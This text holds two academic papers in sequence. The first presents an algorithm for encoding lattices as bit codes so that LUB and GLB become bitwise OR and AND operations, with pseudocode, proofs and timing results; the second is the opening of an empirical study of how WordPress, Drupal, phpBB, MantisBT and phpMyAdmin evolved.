Pass 1 starts at layer 1, and first the prefix length of the current layer is calculated. This is the sum of the number of impure nodes and the maximum number of pure sibling nodes$^3$ (e.g., in Figure 6 at layer 1 there is one node c which is impure, and nodes d and e form the largest set of pure sibling nodes; hence the prefix length at this layer is 3). Next the impure nodes are assigned distinct prefixes of the form $2^i$ (i.e., a '1' in the $i$th bit position) which are not used again. This gives a unique identity to the node (Lemma 1), since only ancestors and descendants of this node can now have a 1 at the $i$th position. While coding the pure nodes we follow the same strategy as for a tree (e.g., in Figure 6 at layer 1 node c is assigned the code 100, which is not used again). After this, at the next layer, each node gets the bitwise OR of its children's codes; then each code is prefixed similarly. The process continues for every subsequent layer until we reach the topmost layer. Consider the lattice in Figure 1. Figure 6 illustrates the result of applying Pass 1 of the modified algorithm to it.

In Pass 2 we prefix the code of a pure node with the leftmost $d$ bits of its parent, where $d = \text{length(parent.code)} - \text{length(child.code)}$. The code of an impure node is prefixed by $d$ 0's so that its code length remains the same as that of the other nodes. Thus we get the codes in Figure 7.
$^2$The number of parents of a node.
$^3$We note that in most cases in practice the number of nodes with indegree greater than 1 is small.

Figure 6: Codes after Pass 1

Our encoding algorithm ensures that the LUB of two nodes has a '1' at all the positions at which the bitwise OR of the codes of the two nodes has a 1, and possibly a few more. We say that the LUB subsumes the bitwise OR of the codes.

**Definition 5:** $b.\text{code}$ subsumes $a.\text{code}$ iff

$$\forall i\,((2^i \,\&\, a.\text{code}) = 2^i \implies (2^i \,\&\, b.\text{code}) = 2^i)$$

where $\&$ denotes the bitwise AND operation.

**Example:** Consider the nodes c and e in Figure 7. The bitwise OR of their codes is 01101, but there is no node with such a code, so we look for a node whose code subsumes this code. Nodes g and h both subsume 01101, since they are both upper bounds of nodes c and e. Of these, node g is the LUB since it is at a lower layer.

Algorithm Encode(L : lattice)
    Form_Layers(L : lattice);
    Pass1(L : lattice);
    Pass2(L : lattice);

Figure 8: Algorithm Encode

After encoding, the codes may be stored in an array sorted lexically by the codes. A linear search on this array for the LUB code will take $O(n)$ time. Alternatively, the codes may be stored in a data structure which is the same as the original lattice. Suppose lub.code is the bitwise OR of the codes whose LUB we are computing. We start at the maximal node and move to the child which subsumes lub.code. We keep moving similarly until we get a node whose children do not subsume lub.code; this node is the LUB. This operation takes $O(h)$ time, where $h$ is the height of the lattice. These modifications and a few more yield the algorithm in the following section.

## 5 Algorithm Encode

This section describes the procedures invoked by Algorithm Encode (Figure 8) in detail. Form_Layers divides the lattice into layers.
The layering is done using a depth-first search starting at the minimal node and going upwards. A layer is a set of incomparable nodes - a cochain - computed as the set of all the immediate parents that cannot be reached later. Algorithm Encode next executes Pass1 and Pass2. We now describe them in detail.

In a lattice it is possible that some, but not all, of the children of a node reside in layers below the one immediately below the node's layer. However, the proof of correctness of the algorithm is simplified by the notion that there exists a continuous path (i.e., a path that does not jump across layers) between each ancestor-descendant pair. If an edge jumps across layers we will assume that virtual nodes are inserted in each intermediate layer along the edge from the child to the parent. Each of these virtual nodes can be seen as having the code of the child. This notion will only be required to prove correctness of the algorithm.

int : curr_code_len, unik[max_noof_layers]
    /* the i-th element of the array unik stores the bit position from which
       the pure nodes in the i-th layer are assigned codes */

procedure Pass1(L : lattice)
 1.  int layer_no, i, d, prefix, virtual_code
     node n, m
     global int : curr_code_len, unik[max_noof_layers]
 2.  curr_code_len ← 0
 3.  For layer_no ← 1 to max_layer do
 4.    For each node n in the layer numbered layer_no do
         /* get the bitwise OR of all the children codes */
 5.      n.code ← zero(curr_code_len)  /* initialize n.code to a string of curr_code_len 0's */
 6.      For each node c ∈ children(n) do
 7.        n.code ← n.code OR c.code
 8.      endfor
 9.      If outdegree(n) = 1 then
10.        If indegree(child(n)) = 1 then
11.          i ← left_most_1(child(n))  /* bit position of the leftmost 1 in the child's code */
12.          n.code ← 2^(i-1) OR child(n).code
13.        endif
14.      endif
15.    endfor
16.    If layer_no ≠ max_layer do
17.      curr_code_len ← curr_code_len + compute_prefix_len(layer_no)
18.      i ← curr_code_len  /* the bit position from which coding will start at this layer;
                               first encode the impure nodes */
19.      For each node n in the layer numbered layer_no do
20.        If indegree(n) > 1 then
21.          n.code ← 2^i OR n.code
22.          n.code_len ← curr_code_len
23.          i ← i - 1
24.        endif
25.      endfor  /* impure nodes encoding finished */
26.      unik[layer_no] ← i  /* the bit position from which the pure nodes in the layer
                                numbered layer_no are assigned codes */
27.      For each node m in the layer numbered layer_no + 1 do
28.        name_children(m, layer_no)
29.      endfor
30.    endif
31. endfor

Figure 9: Pass1

In Pass1 the algorithm starts at layer 1 (the minimal node resides in layer 0) and proceeds to the topmost layer, i.e., the layer in which the maximal node exists. Procedure zero(i) returns a bit pattern of i 0's, used to initialize the code. Every node in the current layer first gets the bitwise OR of the codes of its children (lines 6-8 in Figure 9). Note that if the outdegree of a node is one and the indegree of its only child is also one, then the algorithm of the previous section would assign identical codes to these two nodes. Lines 9 to 14 in Figure 9 take care of this contingency. The call left_most_1(child(n)) returns the bit position at which a '1' was introduced when child(n) was encoded, which is the leftmost 1 in its code; let this be i. Line 12 then introduces a 1 at position i - 1 in n.code. This amounts to inserting a virtual child of n (see below for a description of the manner in which sibling nodes are prefixed by name_children).

The rest of Pass1 (lines 16-30 in Figure 9) is performed for all the layers except the topmost layer. First the length of the prefix to be attached is calculated by compute_prefix_len and curr_code_len is incremented (lines 17-18 in Figure 9). We will discuss the procedure compute_prefix_len after discussing Pass1. Next (lines 19-25 in Figure 9) the nodes with indegree greater than one are taken and each one is given a distinct prefix.
This ensures that a 1 at this bit position can be introduced only by this node (see Lemma 1). When all such nodes have been prefixed, the bit position from which the prefixing of the pure nodes can start is stored in the array unik (line 26 in Figure 9). Thus the prefixes greater than $2^{unik[layer\_no]}$ are used to uniquely prefix the nodes with indegree greater than one, and the prefixes less than or equal to $2^{unik[layer\_no]}$ are used to prefix the nodes with indegree equal to one.

Now (lines 27-29 in Figure 9) the nodes at the next higher layer are taken one after another (note that each such node has at least one child in the current layer) and their children$^4$ are prefixed, or named, by name_children. This procedure gives distinct prefixes to the codes of those children of parent that are not yet prefixed, i.e., the nodes with indegree equal to one. The idea is to make the sibling codes distinct.

$^4$The nodes in the lower layers to which a node is connected.

procedure name_children(parent : node, layer : int)
    int j
    global int curr_code_len, unik[max_noof_layers]
    node n
    If parent.layer_no ≠ layer + 1 then return
    j ← unik[layer]
    For each node n ∈ children(parent) do
        If indegree(n) = 1 then
            n.code ← 2^j OR n.code
            n.code_len ← curr_code_len
            j ← j - 1

Figure 10: procedure name_children

Note that the parent node is in layer layer_no + 1; thus some, but not all, of its children may be at deeper layers than layer_no, and the procedure can be invoked by a child at a deeper layer. We wish to start encoding the siblings when the sibling at the highest layer calls name_children; hence the check at the first line of the procedure.

Now we are in a position to discuss the computation of the prefix length in Pass1. This task is carried out by the procedure compute_prefix_len. It uses the procedure max_pure_siblings, which we discuss first. The children with indegree equal to one are called pure children. Procedure noof_pure_children(n : node) returns the number of pure children of a node n.
Procedure max_pure_siblings uses noof_pure_children to compute the cardinality of the largest set of pure sibling nodes at the given layer.

procedure max_pure_siblings(j : layer)
    int noof_siblings
    node m
    noof_siblings ← 0
    For each node m in layer j + 1 do
        If noof_pure_children(m) > noof_siblings then
            noof_siblings ← noof_pure_children(m)
    return(noof_siblings)

Figure 11: procedure max_pure_siblings

Procedure compute_prefix_len first initializes len to the number of nodes with indegree greater than one in the layer (noof_indgr_gt_1). Next the maximum number of pure sibling nodes is determined. This will turn out to be one if there is only one pure node in the layer; in that case name_children would prefix the pure node with a 1 in the rightmost bit position allowed in this layer, say i. Now if the pure node's parent has outdegree one then, while encoding the parent, Algorithm Encode would (lines 9-14 in Figure 9) try to place a 1 at bit position i − 1. Placing a 1 at this bit position may incorrectly relate the parent node to a node at layer_no − 1. Hence a check is made to see if max_pure_siblings indeed returns 1. If it does, a further check is made to see if the parent has outdegree 1; if so, len is incremented by 2, otherwise it is incremented by the value returned by max_pure_siblings.

Pass2 is extremely simple. It starts at the layer just below the topmost layer and goes down to the bottommost layer. For each node the difference d between the parent's code length and the node's code length is calculated. If the indegree of the node is greater than one then the code is prefixed by d zeroes (zero(i : int) returns a string of i zeroes); otherwise the code is prefixed by the first d bits of the parent (first(d, q) returns the leftmost d bits of q.code). This completes the discussion of Algorithm Encode. In the next section we analyze its time complexity.

### 5.1 Analysis of Algorithm Encode

Let $n$ be the total number of nodes in the lattice.
Let $n_i$ denote the number of nodes in layer $i$. Further, let $e$ be the total number of edges in the lattice and $e_i$ be the number of edges originating from the nodes in layer $i$. Note that $\sum_i n_i = n$ and $\sum_i e_i = e$. We will assume that the nodes are stored in an array sorted according to layers. The ordering inside a particular layer does not matter. This ordering can be performed in $O(n + e)$ time from a graph represented using adjacency lists.

procedure compute_prefix_len(i : layer)
    int len
    len ← noof_indgr_gt_1(i)  /* each impure node must be prefixed uniquely */
    If (max_pure_siblings(i) = 1) then  /* only 1 pure node, say n, in layer i */
        If outdegree(parent(n)) = 1 then
            len ← len + 2
        else
            len ← len + 1
    else
        len ← len + max_pure_siblings(i)
    return(len)

Figure 12: procedure compute_prefix_len

procedure Pass2(L : lattice)
    For layer_no ← max_layer − 1 downto 0 do
        For each node n in layer_no do
            d ← parent.code_len − n.code_len
            If indegree(n) > 1 then
                prefix ← zero(d)
            else
                prefix ← first(d, parent.code)
            n.code ← concatenate(prefix, n.code)

Figure 13: Pass2

We will first analyze Pass1. Consider the steps performed by Pass1 at layer $i$. First each node gets the bitwise OR of all its children's codes (lines 4 to 15 in Figure 9). This involves exactly $e_i$ steps. After this compute_prefix_len is called (line 17 in Figure 9). Procedure compute_prefix_len (Figure 12) first determines the number of impure nodes in layer $i$. This takes one run through the layer and thus $O(n_i)$ time. It then calls max_pure_siblings. Procedure max_pure_siblings (Figure 11) checks every node which is a child of a node in layer $i + 1$; this takes $O(e_{i+1})$ time. Thus compute_prefix_len takes $O(n_i + e_{i+1})$ time in layer $i$. Next in Pass1 (lines 19 to 25) the impure nodes are encoded. This takes one run through the layer and thus $O(n_i)$ time. After this (lines 27 to 29) each node in layer $i + 1$ is taken and procedure name_children is called each time.
Procedure name_children (Figure 10) works on all the children of its argument node. Thus in lines 27 to 29 all the children of the nodes in layer $i + 1$ are encountered; this takes $O(e_{i+1})$ time. Thus Pass1 takes $e_i + O(n_i + e_{i+1}) + O(n_i) + O(e_{i+1})$ time, which simplifies to $O(n_i + e_{i+1})$ time for each layer $i$. Summing over all layers we get the time complexity of Pass1 to be $O(n + e)$. In Pass2 every node is visited exactly once, so it takes $\Theta(n)$ time. Thus the time complexity of Algorithm Encode is $O(n + e)$. For sparse lattices $e = O(n)$, so the algorithm is linear in the number of nodes. The experimental results (Figure 16) tally with this analytical result. This concludes the analysis of Algorithm Encode. In the next section we prove its correctness.

## 6 Correctness

In this section we prove the correctness of our algorithm and show how the encoding leads to the reduction of the LUB computation to an OR operation on the codes.

**Lemma 1:** If an impure node (indegree greater than one) receives a prefix in Pass 1 such that the $i$th bit becomes 1, then only its ancestors and descendants can have a 1 at the $i$th position in their final codes.

**Proof:** In Pass 1 the impure nodes are taken separately and assigned distinct prefixes (lines 20-24 in Figure 9). A node with indegree greater than one is the only node in the layer which has a 1 at the unique position. Hence only nodes related to it can get a 1 at that position: the ancestors get it in Pass 1 and the descendants in Pass 2. $\square$

**Lemma 2:** Consider two nodes $a, b$ such that $a.\text{layer\_no} < b.\text{layer\_no}$ but $b$ is not an ancestor of $a$. Let $a'$ be an ancestor of $a$ in $b.\text{layer\_no}$. Let $a = a_1, a_2, \ldots, a_n = a'$ be a path from $a$ to $a'$. Finally, let all $a_i$'s and $b$ have indegree 1. If $a'$ and $b$ are non-sibling nodes then $b.\text{code}$ does not subsume $a.\text{code}$.
**Proof:** The proof is by contradiction. Let us assume that $b.\text{code}$ subsumes $a.\text{code}$, i.e.,

$$\forall i\,((2^i \,\&\, a.\text{code}) = 2^i \implies (2^i \,\&\, b.\text{code}) = 2^i)$$

We will refer to this as the subsumption supposition. Let the LUB of nodes $a'$ and $b$ be node $p$. Let $a' = a_1', a_2', \ldots, a_{n-1}', a_n' = p$ be a path from $a'$ to $p$. Every $a_i'$ has indegree 1. Further, no $a_i'$ except $a_n' = p$ is an ancestor of node $b$; if some $a_i'$ were, then that $a_i'$ would be the LUB of $a'$ and $b$. Let $b = b_1, b_2, \ldots, b_n = p$ be a path from node $b$ to node $p$. Consider nodes $a_{n-1}'$ and $b_{n-1}$. They are children of $p$, hence they are siblings. They were given distinct prefixes in Pass 1 by name_children (Figure 10), such that $2^i \,\&\, a_{n-1}'.\text{code} = 2^i$ (a 1 in the $i$th bit position) while $2^i \,\&\, b_{n-1}.\text{code} = 0$. The prefixes of $a_{n-1}'$ and $b_{n-1}$ will be passed down to nodes $a'$ and $b$ respectively, and the prefix of $a'$ will be passed down to $a$ during Pass 2. Hence node $a$ has a 1 at a position where node $b$ has a 0, contradicting the subsumption supposition. $\square$

We claim (and will subsequently prove) that Algorithm Encode encodes in such a way that node $a$'s code subsumes node $b$'s code iff node $a$ is an ancestor of node $b$ (i.e., if there is a '1' at the $i$th position in a node's code, then there is a '1' at the $i$th position of each of its ancestors' codes). Thus the OR operation on two codes yields a code that has 1's in these identifying positions.
All the nodes whose codes subsume this code are upper bounds of the two initial nodes. Algorithm Encode imposes a lexical ordering on related nodes according to layers (if $a.\text{layer\_no} < b.\text{layer\_no}$ and $a$ is related to $b$ then $a.\text{code} \prec b.\text{code}$, where $\prec$ refers to lexical ordering with $0 \prec 1$). Hence the lexically least code of these upper bounds is the code of the LUB.

**Lemma 3:** Algorithm Encode encodes the nodes such that if two nodes $a$ and $b$ are unrelated (i.e., they do not form an ancestor-descendant pair) then

$$\exists i \mid ((2^i \,\&\, a.\text{code}) = 2^i) \text{ and } ((2^i \,\&\, b.\text{code}) = 0)$$

**Proof:** The proof is by contradiction. Assume without loss of generality that $a.\text{layer\_no} \leq b.\text{layer\_no}$, and suppose that $b.\text{code}$ subsumes $a.\text{code}$, i.e.,

$$\forall i\,((2^i \,\&\, a.\text{code}) = 2^i \implies (2^i \,\&\, b.\text{code}) = 2^i)$$

As before, we will refer to this as the subsumption supposition.

Can indegree(a) > 1? If yes, then the prefix assigned to node $a$ in Pass 1 was unique (lines 20-24 in Figure 9), and no node which is unrelated to node $a$ can have a 1 in that position. But we have supposed that there exists such a node, namely node $b$. This contradicts the subsumption supposition. Hence indegree(a) = 1.

Let $a'$ be the ancestor of $a$ in layer $b.\text{layer\_no}$. Let $a = a_1, a_2, \ldots, a_n = a'$ be a path from $a$ to $a'$. All $a_i$'s have indegree 1, for the following reason. $a_2 = \text{parent}(a)$ has indegree 1: if it had indegree greater than 1 then it would have been given a unique prefix (i.e., a 1 at, say, the $i$th bit position) in Pass 1. Node $b$ is unrelated to node $a$, so it is unrelated to parent(a) too; thus node $b$ can't have a 1 at the $i$th bit position.
Node \( a \) gets a 1 in the \( i \)-th position in Pass 2, which contradicts the subsumption supposition. Hence indegree(parent(\( a \))) = 1. Proceeding similarly, all nodes along the path from node \( a \) to node \( a' \) have indegree 1. Now consider two separate cases: indegree(\( b \)) > 1 and indegree(\( b \)) = 1.

Case 1: indegree(\( b \)) > 1. In Pass 1 (lines 20-22 in Figure 9) node \( b \) was assigned a distinct prefix, such that the \( i \)-th bit became 1. \( a' \) was also assigned a prefix such that the \( j \)-th bit became 1, with \( i \neq j \). \( b \) has a 0 at the \( j \)-th position. But \( a' \) has a 1 at the \( j \)-th position, and since \( a \) is related to \( a' \), in Pass 2 the prefix of \( a' \) will be passed down to \( a \); thus \( a \) has a 1 at the \( j \)-th position. (Note that all the nodes along the path from \( a' \) to \( a \) have indegree 1, so the prefix will not be gobbled up half-way through.) This contradicts the subsumption supposition. Hence this case is proved.

Case 2: indegree(\( b \)) = 1.
2.a) If \( a' \) and \( b \) are non-sibling nodes then by Lemma 2 this case is proved.
2.b) If \( a' \) and \( b \) are sibling nodes then $name\_children$ assigned them distinct codes in Pass 1. \( a' \) has a 1 at the \( i \)-th position where node \( b \) has a 0. Since \( a \) is related to \( a' \), in Pass 2 the prefix of \( a' \) will be passed down to \( a \), so \( a \) also has a 1 at position \( i \). This contradicts the subsumption supposition, and this case is proved.

It is clear that the code of a node is subsumed by each of its ancestors' codes. Combining this with Lemma 3 we can say that:

**Theorem 1**: Algorithm Encode encodes in such a way that only a node's ancestors subsume its code.

In this section we have proved the correctness of Algorithm Encode. We will now proceed to make a few additions to the above algorithm so that we can get the GLB as well.
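As a sketch, the LUB lookup implied by Theorem 1 (OR the two codes, collect the nodes whose codes subsume the result, take the lexically least) can be illustrated on a hand-built diamond lattice. The codes below are invented for illustration, not produced by Algorithm Encode; they merely satisfy the property that each node's code is subsumed by its ancestors' codes.

```python
# Hypothetical diamond lattice: P is the top, C1 and C2 its children,
# Z the common child of C1 and C2. Codes are hand-assigned so that
# every ancestor's code subsumes (bitwise contains) its descendants'.
WIDTH = 3
code = {"Z": 0b001, "C1": 0b011, "C2": 0b101, "P": 0b111}

def subsumes(x, y):
    """x subsumes y: every 1-bit of y is also set in x."""
    return (x & y) == y

def lub(a, b):
    target = code[a] | code[b]
    # upper bounds: nodes whose code subsumes the OR of the two codes
    ubs = [n for n, c in code.items() if subsumes(c, target)]
    # lexically least fixed-width bit string == numerically smallest
    return min(ubs, key=lambda n: code[n])

print(lub("C1", "C2"))  # P
print(lub("Z", "C1"))   # C1 (the LUB of a node and its ancestor)
```

The lexical minimum works because any proper ancestor of an upper bound carries an extra 1, making its code lexically greater under the \(0 \prec 1\) ordering.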
### 6.1 GLB Computation

In this section we discuss procedure $glb\_info$, which can be called from Pass 1 so that the same set of codes yields the GLB as well. Consider two nodes $a$ and $b$. If $a.\text{code}$ subsumes $b.\text{code}$ then by Theorem 1 $a$ is an ancestor of $b$, and therefore node $b$ is the GLB of nodes $a$ and $b$. Similarly, if $b.\text{code}$ subsumes $a.\text{code}$ then $a$ is the GLB. This check takes $O(1)$ time. Now suppose that neither $a$ nor $b$ subsumes the other. Then by Theorem 1 nodes $a$ and $b$ do not form an ancestor-descendant pair. Since we are dealing with a lattice, the GLB of $a$ and $b$ definitely exists, and it must now be an impure node. Thus the GLB must have been uniquely prefixed in Pass 1 (the minimal node is the only exception to this). Suppose the $i$-th bit became 1 due to the unique prefixing. By Lemma 1, both $a$ and $b$ have 1 at the $i$-th bit position. Let $impure\_1s$ store the positions at which a 1 is introduced while encoding the impure nodes; thus bit $i$ of $impure\_1s$ is 1 iff a 1 was introduced at bit position $i$ while encoding an impure node of the lattice. Moreover, let $glb$ be an array which stores the impure node names or indices, such that $glb[i]$ gives the impure node whose encoding led to the introduction of a 1 at the $i$-th bit position. We perform these operations in procedure $glb\_info$ (Figure 14). It is called from Pass 1 when an impure node is encountered (line 20 in Figure 9).

```
/* node n is an impure node which introduces a 1 at bit
   position i during Pass 1; procedure glb_info stores
   this information */
procedure glb_info(n : node, i : integer)
begin
    global int : impure_1s
    global array of nodes : glb[]
    impure_1s <- 2^i OR impure_1s
    glb[i] <- n
end procedure
```

Figure 14: procedure glb_info
Note that these operations do not increase the time complexity of Algorithm Encode, since procedure $glb\_info$ takes $O(1)$ time. Finally, to get the GLB of nodes $a$ and $b$, we first take the bitwise AND of $a.\text{code}$, $b.\text{code}$ and $impure\_1s$; let this be $c.\text{code}$. $c.\text{code}$ has 1's at those bit positions at which 1's were introduced by their common impure descendants and ancestors. A node at a higher layer introduces a 1 to the left of the 1 introduced by a node at a lower layer. We now use $left\_most\_1$ to find the bit position of the leftmost 1 in $c.\text{code}$; let this be $i$. Now $glb[i]$ yields the topmost common ancestor or descendant of $a$ and $b$. We note that Algorithm Encode imposes a lexical ordering on related nodes according to layers. So if $a.\text{code} \prec i.\text{code}$ or $b.\text{code} \prec i.\text{code}$ then we do not have the GLB, because node $i$ surely resides at a layer higher than that of $a$ or $b$. So we take the next leftmost bit position in $impure\_1s$ and check again, until $i.\text{code} \prec a.\text{code}$ and $i.\text{code} \prec b.\text{code}$. If we fail to find such a node, or if $c.\text{code}$ has 0's at all the bit positions, then the minimal node is the GLB. This search takes $O(n_{impure})$ time, where $n_{impure}$ is the number of impure nodes in the lattice. Thus the GLB computation takes $O(n_{impure})$ time. We have already noted that in practice $n_{impure}$ is usually small, so GLB computation is very fast. Throughout the discussion we dealt with a lattice, so every pair of nodes had a distinct GLB and LUB. However, this restriction can be relaxed: the algorithm works in exactly the same way on a structure in which a pair of nodes has more than one LUB or GLB.
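The mechanical part of this search (mask with $impure\_1s$, then enumerate candidates from the leftmost 1 towards the right via $glb[i]$) can be sketched as follows. The table and bit patterns are hypothetical; the lexical-order acceptance test and the fall-back to the minimal node are left to the caller, since they depend on the lattice's layer numbering.

```python
def left_most_1(x):
    """Bit position of the leftmost (most significant) set bit; -1 if x == 0."""
    return x.bit_length() - 1

def glb_candidates(a_code, b_code, impure_1s, glb_table):
    """Yield the impure-node candidates for GLB(a, b), leftmost bit first.
    glb_table maps a bit position to the impure node that introduced it."""
    c = a_code & b_code & impure_1s   # c.code in the text
    while c:
        i = left_most_1(c)
        yield glb_table[i]
        c &= ~(1 << i)                # clear this bit, try the next leftmost 1

glb_table = {2: "M", 0: "N"}          # hypothetical impure nodes
print(list(glb_candidates(0b101, 0b111, 0b101, glb_table)))  # ['M', 'N']
```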
The proof of the algorithm for this structure proceeds along exactly the same lines.

7 Implementation

The algorithm was implemented in C. It was tested on randomly generated posets: a tree was built with each node having a random degree, and then edges were randomly added between unconnected nodes. The number of edges added was varied. As expected, the code length was smallest when few new edges were added. In Figure 15 the three curves correspond to different percentages, \( p \), of the total number of nodes with outdegree greater than one. Each curve represents the average number of bits required to encode a lattice with the corresponding number of nodes at the specified percentage of nodes with outdegree greater than one. It may be noted here that when the total number of nodes and the number of nodes with outdegree greater than one were specified, the code length remained remarkably stable over the different lattices produced. Next we show the time required to compute the codes in Figure 16. The computation time did not vary appreciably with the percentage of nodes with outdegree greater than one, so only one curve has been drawn; it shows the computation time when 9 percent of the nodes had outdegree greater than one.

8 Conclusion

We have presented a simple algorithm for encoding a tree for LUB computation. The algorithm was then further evolved so that it could be applied to a lattice. This required dividing the lattice into layers and, finally, making further changes in the algorithm itself to take care of the differences between a tree and a lattice; the main difference is that a lattice can have nodes with indegree greater than one, while a tree cannot. We proceeded to analyze the algorithm and prove its correctness formally, and then presented the experimental results. We noted that the same encoding also yields the GLB, essentially by applying the bitwise AND operation on the codes. Our schemes can be generalized to non-unique GLBs and LUBs.
These techniques can be applied for efficient computation of lattice operations, which are becoming more and more important in programming languages supporting object inheritance.

9 Acknowledgments

Thanks are due to Patrick Lincoln for sending us a small poset and describing their method of poset generation. We owe special thanks to Chilikuri Mohan and V.S. Subrahmanian for thoroughly reading the paper and giving valuable suggestions.
Maintenance Patterns of large-scale PHP Web Applications

Panos Kyriakakis
School of Science and Technology
Hellenic Open University
Patras, Greece
panos@salix.gr

Alexander Chatzigeorgiou
Department of Applied Informatics
University of Macedonia
Thessaloniki, Greece
achat@uom.gr

Abstract—Scripting languages such as PHP have been criticized as inadequate for supporting maintenance of large-scale software projects. In this paper we attempt to provide insight into the way that five large and well-known PHP applications evolved over time. Several aspects of their history are examined, including the amount of unused code, the removal of functions, the use of libraries, the stability of their interfaces, the migration to object-orientation and the evolution of complexity. The results suggest that these systems undergo systematic maintenance which is driven by targeted design decisions, and that evolution is by no means hindered by the underlying programming language.

Keywords—software evolution; web applications; survival analysis; software libraries; PHP; scripting language

I. INTRODUCTION

Various anecdotal sources in computer science have long claimed that, despite their tremendous popularity [2], scripting languages such as those employed in LAMP (Linux-Apache-MySQL-Perl/Python/PHP) are not suitable for proper and professional software engineering [10]. In other words, the proponents of traditional compiled languages such as Java and C++ claimed that software projects based on scripting languages lack the architectural properties that allow systematic, effortless and viable maintenance. Such attacks on scripting languages are less frequently documented in scientific papers, although the academic community usually tends to reject the change in programming practices brought about by scripting [10].
This skepticism is also reflected by the fact that in most academic institutions around the world, computing curricula do not rely on scripting or dynamic languages for their CS101 course. The number of empirical studies in the software engineering community on projects built with typeless scripting languages is also significantly smaller than that on 'system programming' languages. On the other hand, evidence suggests that scripting languages enhance programmer productivity [12]. Prechelt [14] presented results according to which implementation times for programs written in scripting languages, such as Perl, Python, Rexx, and Tcl, were about one-half of the time required to implement the same functionality in C/C++/Java. The adoption of scripting languages by software practitioners is also reflected in their increased penetration into open-source development: on SourceForge1, PHP ranks third with 33,259 projects, after Java (52,234 projects) and C++ (42,081 projects), and ahead of C (31,194 projects). In this paper we present an empirical study on five large open-source web applications implemented with the popular scripting language PHP, to investigate the evolution of web applications regarding their maturity, quality and adoption of the object-oriented paradigm. We have examined several aspects of software evolution that might provide hints as to whether good practices in development and management have been followed. The existence of dead/unused code in any software system is a burden, consuming resources and posing threats to maintainability. We examine the presence and survivability of unused code as a means of detecting architectural changes in the history of the examined systems. In scripting languages a major source of unused code is the employment of third-party libraries, which at the same time is an accepted good practice in software development and a possible indication of maturity [1], [2].
In this context, we investigated the amount of library code being used over time in each system. Another factor implying software maturity is the stability of the corresponding APIs; therefore, we have also examined six classes of possible API changes. Moreover, we investigated the migration of the analyzed projects to the object-oriented paradigm as well as the evolution of their complexity. The rest of the paper is organized as follows: In Section II we introduce the web applications that have been analyzed, while in Section III we discuss issues and challenges related to the analysis of the examined versions. Results on each of the investigated aspects of software evolution are presented and discussed in Section IV. Threats to validity are summarized in Section V. Related work on similar efforts for analyzing software systems and previous work on scripting languages is presented in Section VI. Finally, we conclude in Section VII.

1 http://sourceforge.net

II. APPLICATIONS

The software systems used in the case study have been selected according to the following criteria. Our major concern was to select acknowledged open-source projects implemented in PHP, with a long history, a large number of committers and an even larger number of users. According to Samoladas et al. [15] the majority of open-source projects are abandoned after a short time period, rendering them inappropriate for systematic analysis of programming and maintenance habits. The case study has been conducted on the following five open source projects implemented in PHP:

1. **WordPress**. The most popular blogging software; it has a vast community of both contributors and active users.
2. **Drupal**. One of the most advanced CMS (Content Management Systems). It is also characterized by a large and active community.
3. **PhpBB**. One of the most widely used forum software packages.
4. **MantisBT**.
Probably the most popular bug tracking application written in PHP. 5. **phpMyAdmin**. The well-known MySQL administration tool. The abovementioned software systems are to a large extent community driven and could be characterized as the founding projects of web application development (considering PHP as the programming language). They have set the standards and powered most of the web content created in the last decade. The fact that the examined projects have an enormous code base and numerous user plug-ins dependent upon them implies that backward compatibility should never be broken. Due to the projects' long existence there are many versions available. In Table I we show some statistics about the selected projects. Cumulatively, we have studied 390 official releases aggregating to 50 years of software evolution. **TABLE I.** RELEASE STATISTICS FOR THE EXAMINED PROJECTS <table> <thead> <tr> <th>Project</th> <th>Years</th> <th>First Release</th> <th>Last Release</th> <th>Number of Releases</th> </tr> </thead> <tbody> <tr> <td>WordPress</td> <td>9</td> <td>1.5 (2005)</td> <td>3.6 (2013)</td> <td>71</td> </tr> <tr> <td>Drupal</td> <td>12</td> <td>4.0 (2002)</td> <td>7.23 (2013)</td> <td>120</td> </tr> <tr> <td>PhpBB</td> <td>12</td> <td>2.0 (2002)</td> <td>3.6 (2013)</td> <td>27</td> </tr> <tr> <td>MantisBT</td> <td>8</td> <td>1.0 (2006)</td> <td>1.25 (2013)</td> <td>33</td> </tr> <tr> <td>phpMyAdmin</td> <td>9</td> <td>2.0 (2006)</td> <td>4.1 (2014)</td> <td>129</td> </tr> </tbody> </table> In the next table we outline the growth of basic size measures. For the first and the last release examined, the size of the source code in KLOCs and the size in code blocks (number of functions and class methods) are shown.
**TABLE II.** SIZE MEASURES FOR THE FIRST AND LAST RELEASE OF THE EXAMINED PROJECTS <table> <thead> <tr> <th>Project</th> <th>First Release</th> <th>Last Release</th> <th>Code Blocks (First)</th> <th>Code Blocks (Last)</th> </tr> </thead> <tbody> <tr> <td>WordPress</td> <td>1.5 (2005)</td> <td>3.6 (2013)</td> <td>763</td> <td>5154</td> </tr> <tr> <td>Drupal</td> <td>4.0 (2002)</td> <td>7.23 (2013)</td> <td>692</td> <td>5140</td> </tr> <tr> <td>PhpBB</td> <td>2.0 (2002)</td> <td>3.6 (2013)</td> <td>256</td> <td>2389</td> </tr> <tr> <td>MantisBT</td> <td>1.0 (2006)</td> <td>1.25 (2013)</td> <td>2447</td> <td>4904</td> </tr> <tr> <td>phpMyAdmin</td> <td>2.0 (2006)</td> <td>4.1 (2014)</td> <td>693</td> <td>5543</td> </tr> </tbody> </table> The size growth reflected in the lines of code confirms Lehman's 6th law of software evolution [8], which stipulates that programs grow over time to accommodate pressure for change and satisfy an increasing set of requirements. As proposed by Xie et al. [21], the number of definitions can provide an accurate indicator to study the size growth. Since in PHP the only clearly defined structures are functions and class methods, we measured their total number (designated as the number of code blocks). Lehman's 6th law is also vividly confirmed in this context. These systems have their roots back before PHP fully supported object orientation, and this adds another point of interest because they combine procedural code and classes. The poor support of object orientation in PHP versions prior to 5.3 led to that coding style. Due to the mix of procedural and object-oriented programming we do not differentiate between functions and class methods in the applied survival analysis. ### III. THE APPROACH Each application has been analyzed with a software tool that we developed for conducting source code analysis and data collection in a uniform way (Section III.E).
Available versions have been downloaded from GitHub and then static analysis of the source code has been performed to identify function and method signatures, class definitions and function usage data for each version. The extracted information has been stored in a database. Using the stored data we estimated the survival function regarding unused and removed functions. Moreover, we analyzed library usage and the degree of conformance to the object-oriented paradigm by measuring the ratio of class methods over the total number of functions/methods. Finally, we investigated the stability of function signatures as well as the evolution of complexity. Next we discuss some key points in our analysis.

#### A. Challenges in the identification of unused code

